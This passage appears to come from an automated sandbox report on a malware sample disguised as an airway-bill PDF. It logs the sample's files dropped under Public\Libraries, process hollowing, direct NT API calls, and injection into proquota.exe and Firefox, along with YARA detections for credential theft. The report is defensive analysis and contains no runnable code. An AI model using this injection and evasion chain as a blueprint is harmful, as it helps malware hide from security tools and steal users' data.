                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D480A8 mov eax, dword ptr fs:[00000030h]5_2_24D480A8
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D36050 mov eax, dword ptr fs:[00000030h]5_2_24D36050
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CB2050 mov eax, dword ptr fs:[00000030h]5_2_24CB2050
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CDC073 mov eax, dword ptr fs:[00000030h]5_2_24CDC073
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D34000 mov ecx, dword ptr fs:[00000030h]5_2_24D34000
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D52000 mov eax, dword ptr fs:[00000030h]5_2_24D52000
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D52000 mov eax, dword ptr fs:[00000030h]5_2_24D52000
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D52000 mov eax, dword ptr fs:[00000030h]5_2_24D52000
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D52000 mov eax, dword ptr fs:[00000030h]5_2_24D52000
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D52000 mov eax, dword ptr fs:[00000030h]5_2_24D52000
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D52000 mov eax, dword ptr fs:[00000030h]5_2_24D52000
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D52000 mov eax, dword ptr fs:[00000030h]5_2_24D52000
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D52000 mov eax, dword ptr fs:[00000030h]5_2_24D52000
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CCE016 mov eax, dword ptr fs:[00000030h]5_2_24CCE016
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CCE016 mov eax, dword ptr fs:[00000030h]5_2_24CCE016
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CCE016 mov eax, dword ptr fs:[00000030h]5_2_24CCE016
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CCE016 mov eax, dword ptr fs:[00000030h]5_2_24CCE016
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D46030 mov eax, dword ptr fs:[00000030h]5_2_24D46030
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CAA020 mov eax, dword ptr fs:[00000030h]5_2_24CAA020
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CAC020 mov eax, dword ptr fs:[00000030h]5_2_24CAC020
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D2E1D0 mov eax, dword ptr fs:[00000030h]5_2_24D2E1D0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D2E1D0 mov eax, dword ptr fs:[00000030h]5_2_24D2E1D0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D2E1D0 mov ecx, dword ptr fs:[00000030h]5_2_24D2E1D0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D2E1D0 mov eax, dword ptr fs:[00000030h]5_2_24D2E1D0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D2E1D0 mov eax, dword ptr fs:[00000030h]5_2_24D2E1D0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D761C3 mov eax, dword ptr fs:[00000030h]5_2_24D761C3
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D761C3 mov eax, dword ptr fs:[00000030h]5_2_24D761C3
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CE01F8 mov eax, dword ptr fs:[00000030h]5_2_24CE01F8
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D861E5 mov eax, dword ptr fs:[00000030h]5_2_24D861E5
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CF0185 mov eax, dword ptr fs:[00000030h]5_2_24CF0185
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D3019F mov eax, dword ptr fs:[00000030h]5_2_24D3019F
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D3019F mov eax, dword ptr fs:[00000030h]5_2_24D3019F
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D3019F mov eax, dword ptr fs:[00000030h]5_2_24D3019F
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D3019F mov eax, dword ptr fs:[00000030h]5_2_24D3019F
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D54180 mov eax, dword ptr fs:[00000030h]5_2_24D54180
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D54180 mov eax, dword ptr fs:[00000030h]5_2_24D54180
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CAA197 mov eax, dword ptr fs:[00000030h]5_2_24CAA197
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CAA197 mov eax, dword ptr fs:[00000030h]5_2_24CAA197
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CAA197 mov eax, dword ptr fs:[00000030h]5_2_24CAA197
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D6C188 mov eax, dword ptr fs:[00000030h]5_2_24D6C188
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D6C188 mov eax, dword ptr fs:[00000030h]5_2_24D6C188
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D48158 mov eax, dword ptr fs:[00000030h]5_2_24D48158
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D44144 mov eax, dword ptr fs:[00000030h]5_2_24D44144
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D44144 mov eax, dword ptr fs:[00000030h]5_2_24D44144
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D44144 mov ecx, dword ptr fs:[00000030h]5_2_24D44144
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D44144 mov eax, dword ptr fs:[00000030h]5_2_24D44144
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D44144 mov eax, dword ptr fs:[00000030h]5_2_24D44144
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CAC156 mov eax, dword ptr fs:[00000030h]5_2_24CAC156
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CB6154 mov eax, dword ptr fs:[00000030h]5_2_24CB6154
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CB6154 mov eax, dword ptr fs:[00000030h]5_2_24CB6154
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D84164 mov eax, dword ptr fs:[00000030h]5_2_24D84164
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D84164 mov eax, dword ptr fs:[00000030h]5_2_24D84164
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D70115 mov eax, dword ptr fs:[00000030h]5_2_24D70115
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D5A118 mov ecx, dword ptr fs:[00000030h]5_2_24D5A118
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D5A118 mov eax, dword ptr fs:[00000030h]5_2_24D5A118
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D5A118 mov eax, dword ptr fs:[00000030h]5_2_24D5A118
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D5A118 mov eax, dword ptr fs:[00000030h]5_2_24D5A118
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CDAE00 mov eax, dword ptr fs:[00000030h]5_2_24CDAE00
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CDAE00 mov eax, dword ptr fs:[00000030h]5_2_24CDAE00
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CDAE00 mov eax, dword ptr fs:[00000030h]5_2_24CDAE00
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CA8E1D mov eax, dword ptr fs:[00000030h]5_2_24CA8E1D
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D46E20 mov eax, dword ptr fs:[00000030h]5_2_24D46E20
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D46E20 mov eax, dword ptr fs:[00000030h]5_2_24D46E20
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D46E20 mov ecx, dword ptr fs:[00000030h]5_2_24D46E20
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CB2FC8 mov eax, dword ptr fs:[00000030h]5_2_24CB2FC8
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CB2FC8 mov eax, dword ptr fs:[00000030h]5_2_24CB2FC8
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CB2FC8 mov eax, dword ptr fs:[00000030h]5_2_24CB2FC8
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CB2FC8 mov eax, dword ptr fs:[00000030h]5_2_24CB2FC8
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CAEFD8 mov eax, dword ptr fs:[00000030h]5_2_24CAEFD8
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CAEFD8 mov eax, dword ptr fs:[00000030h]5_2_24CAEFD8
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CAEFD8 mov eax, dword ptr fs:[00000030h]5_2_24CAEFD8
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D66FF7 mov eax, dword ptr fs:[00000030h]5_2_24D66FF7
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CCCFE0 mov eax, dword ptr fs:[00000030h]5_2_24CCCFE0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CCCFE0 mov eax, dword ptr fs:[00000030h]5_2_24CCCFE0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CF0FF6 mov eax, dword ptr fs:[00000030h]5_2_24CF0FF6
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CF0FF6 mov eax, dword ptr fs:[00000030h]5_2_24CF0FF6
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CF0FF6 mov eax, dword ptr fs:[00000030h]5_2_24CF0FF6
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CF0FF6 mov eax, dword ptr fs:[00000030h]5_2_24CF0FF6

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Memory allocated: C:\Users\Public\Libraries\hdcleziT.pif base: 400000 protect: page execute and read and write
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIF | Memory allocated: C:\Users\Public\Libraries\hdcleziT.pif base: 400000 protect: page execute and read and write
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIF | Memory allocated: C:\Users\Public\Libraries\hdcleziT.pif base: 400000 protect: page execute and read and write
                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exe | NtResumeThread: Direct from: 0x773836AC
                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exe | NtMapViewOfSection: Direct from: 0x77382D1C
                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exe | NtWriteVirtualMemory: Direct from: 0x77382E3C
                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exe | NtProtectVirtualMemory: Direct from: 0x77382F9C
                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exe | NtSetInformationThread: Direct from: 0x773763F9
                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exe | NtCreateMutant: Direct from: 0x773835CC
                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exe | NtNotifyChangeKey: Direct from: 0x77383C2C
                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exe | NtSetInformationProcess: Direct from: 0x77382C5C
                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exe | NtCreateUserProcess: Direct from: 0x7738371C
                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exe | NtQueryInformationProcess: Direct from: 0x77382C26
                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exe | NtResumeThread: Direct from: 0x77382FBC
                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exe | NtWriteVirtualMemory: Direct from: 0x7738490C
                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exe | NtAllocateVirtualMemory: Direct from: 0x77383C9C
                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exe | NtReadFile: Direct from: 0x77382ADC
                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exe | NtAllocateVirtualMemory: Direct from: 0x77382BFC
                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exe | NtDelayExecution: Direct from: 0x77382DDC
                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exe | NtQuerySystemInformation: Direct from: 0x77382DFC
                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exe | NtOpenSection: Direct from: 0x77382E0C
                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exe | NtQueryVolumeInformationFile: Direct from: 0x77382F2C
                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exe | NtQuerySystemInformation: Direct from: 0x773848CC
                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exe | NtReadVirtualMemory: Direct from: 0x77382E8C
                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exe | NtCreateKey: Direct from: 0x77382C6C
                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exe | NtClose: Direct from: 0x77382B6C
                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exe | NtAllocateVirtualMemory: Direct from: 0x773848EC
                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exe | NtQueryAttributesFile: Direct from: 0x77382E6C
                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exe | NtSetInformationThread: Direct from: 0x77382B4C
                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exe | NtTerminateThread: Direct from: 0x77382FCC
                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exe | NtQueryInformationToken: Direct from: 0x77382CAC
                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exe | NtOpenKeyEx: Direct from: 0x77382B9C
                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exe | NtAllocateVirtualMemory: Direct from: 0x77382BEC
                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exe | NtDeviceIoControlFile: Direct from: 0x77382AEC
                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exe | NtCreateFile: Direct from: 0x77382FEC
                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exe | NtOpenFile: Direct from: 0x77382DCC
                      Source: C:\Users\Public\Libraries\hdcleziT.pif | Section loaded: NULL target: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exe protection: execute and read and write
                      Source: C:\Users\Public\Libraries\hdcleziT.pif | Section loaded: NULL target: C:\Windows\SysWOW64\proquota.exe protection: execute and read and write
                      Source: C:\Users\Public\Libraries\hdcleziT.pif | Section loaded: NULL target: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exe protection: execute and read and write
                      Source: C:\Windows\SysWOW64\proquota.exe | Section loaded: NULL target: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exe protection: read write
                      Source: C:\Windows\SysWOW64\proquota.exe | Section loaded: NULL target: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exe protection: execute and read and write
                      Source: C:\Windows\SysWOW64\proquota.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                      Source: C:\Windows\SysWOW64\proquota.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exe | Section loaded: NULL target: C:\Users\Public\Libraries\hdcleziT.pif protection: execute and read and write
                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exe | Section loaded: NULL target: C:\Windows\SysWOW64\proquota.exe protection: execute and read and write
                      Source: C:\Windows\SysWOW64\proquota.exe | Thread register set: target process: 5668
                      Source: C:\Windows\SysWOW64\proquota.exe | Thread APC queued: target process: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exe
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Section unmapped: C:\Users\Public\Libraries\hdcleziT.pif base address: 400000
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIF | Section unmapped: C:\Users\Public\Libraries\hdcleziT.pif base address: 400000
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIF | Section unmapped: C:\Users\Public\Libraries\hdcleziT.pif base address: 400000
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Memory written: C:\Users\Public\Libraries\hdcleziT.pif base: 3E8008
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIF | Memory written: C:\Users\Public\Libraries\hdcleziT.pif base: 30C008
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIF | Memory written: C:\Users\Public\Libraries\hdcleziT.pif base: 3CB008
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Process created: C:\Users\Public\Libraries\hdcleziT.pif C:\Users\Public\Libraries\hdcleziT.pif
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIF | Process created: C:\Users\Public\Libraries\hdcleziT.pif C:\Users\Public\Libraries\hdcleziT.pif
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIF | Process created: C:\Users\Public\Libraries\hdcleziT.pif C:\Users\Public\Libraries\hdcleziT.pif
                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exe | Process created: C:\Windows\SysWOW64\proquota.exe "C:\Windows\SysWOW64\proquota.exe"
                      Source: C:\Windows\SysWOW64\proquota.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exe | Process created: C:\Windows\SysWOW64\proquota.exe "C:\Windows\SysWOW64\proquota.exe"
                      Source: WQzLddwiZR.exe, 00000011.00000000.2546026455.00000000017A1000.00000002.00000001.00040000.00000000.sdmp, WQzLddwiZR.exe, 00000011.00000002.3369641657.00000000017A0000.00000002.00000001.00040000.00000000.sdmp, WQzLddwiZR.exe, 00000013.00000000.2702810332.0000000001150000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: IProgram Manager
                      Source: WQzLddwiZR.exe, 00000011.00000000.2546026455.00000000017A1000.00000002.00000001.00040000.00000000.sdmp, WQzLddwiZR.exe, 00000011.00000002.3369641657.00000000017A0000.00000002.00000001.00040000.00000000.sdmp, WQzLddwiZR.exe, 00000013.00000000.2702810332.0000000001150000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
                      Source: WQzLddwiZR.exe, 00000011.00000000.2546026455.00000000017A1000.00000002.00000001.00040000.00000000.sdmp, WQzLddwiZR.exe, 00000011.00000002.3369641657.00000000017A0000.00000002.00000001.00040000.00000000.sdmp, WQzLddwiZR.exe, 00000013.00000000.2702810332.0000000001150000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
                      Source: WQzLddwiZR.exe, 00000011.00000000.2546026455.00000000017A1000.00000002.00000001.00040000.00000000.sdmp, WQzLddwiZR.exe, 00000011.00000002.3369641657.00000000017A0000.00000002.00000001.00040000.00000000.sdmp, WQzLddwiZR.exe, 00000013.00000000.2702810332.0000000001150000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA, 0_2_02B25A78
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Code function: GetLocaleInfoA, 0_2_02B2A790
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Code function: GetLocaleInfoA, 0_2_02B2A744
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA, 0_2_02B25B84
                      Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Code function: 0_2_02B2918C GetLocalTime
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | Code function: 0_2_02B2B70C GetVersionExA
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIF | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information

                      Source: Yara match | File source: 15.2.hdcleziT.pif.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 15.2.hdcleziT.pif.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.2.hdcleziT.pif.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.2.hdcleziT.pif.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 11.2.hdcleziT.pif.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 11.2.hdcleziT.pif.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000012.00000002.3370454633.0000000000AF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000012.00000002.3370291190.0000000000AA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000B.00000002.2806584419.000000001A250000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000005.00000002.2639223190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000F.00000002.2725067092.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000014.00000002.2805235368.0000000000650000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
